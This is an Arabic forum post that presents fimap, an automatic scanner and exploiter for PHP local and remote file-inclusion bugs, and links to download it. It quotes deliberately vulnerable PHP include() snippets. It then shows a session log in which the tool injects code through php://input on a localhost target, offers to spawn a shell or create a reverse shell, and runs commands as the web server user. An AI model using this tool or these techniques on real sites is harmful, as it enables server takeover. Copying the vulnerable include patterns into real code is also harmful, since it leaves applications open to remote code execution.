|
![]() | رقم المشاركة : 1 (permalink) | ||
![]() بسم الله الرحمن الرحيم هي اداة موجودة في الباك تراك ولكن على ما اعتقد ان اي اداة مكتوبة بـ python ,perl,php ولا تعتمد على ادوات اخرى او بيئة اخرى يمكنك ان تنزلها في الوندوز او الينكس او اي نظام تشغيل مركب فيه perl ,php,python ___________________________ نترككم مع استخداماتها وامثلة تركها صاحب الاداة: Example Runs Absolute Clean <? Absolute with Appendix// Vulerable PHP Code: include($_GET["inc"]); ?>
<? Relative with Appendix// Vulerable PHP Code: <? include($_GET["inc"] . ".php"); ?> ?>
<? Obtaining a Shell// Vulerable PHP Code: include("/var/www/" . $_GET["inc"] . ".php"); ?>
imax@DevelB0x:~$ fimap -x لا تنسو التقييم ، fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter. ################### #List of Domains # ################### #[1] localhost # ################### Choose Domain: 1 ################################################## ######################################### #FI Bugs on localhost # ################################################## ######################################### #[1] URL: '/vulnerable.php?inc=index' injecting file: 'php://input' using param: 'inc' # ################################################## ######################################### Choose vulnerable script: 1 [INFO] Testing code injection thru POST... [OUT] PHP Injection works! Testing if execution works... [OUT] Testing execution thru 'popen'... ################################# #Available Attacks # ################################# #[1] Spawn Shell # #[2] Create reverse shell... # ################################# Choose Attack: 1 ------------------------------------------- Welcome to fimap shell! Better dont start interactive commands! ;) Enter 'q' to exit the shell. ------------------------------------------- fimap_shell$> id uid=33(www-data) gid=33(www-data) groups=33(www-data) fimap_shell$> uname -a Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux fimap_shell$> q See ya dude! imax@DevelB0x:~$ يمكنك تحميل الاداة من هنا h]hm fimap
| |||
| ![]() |
مواقع النشر (المفضلة) |
|
|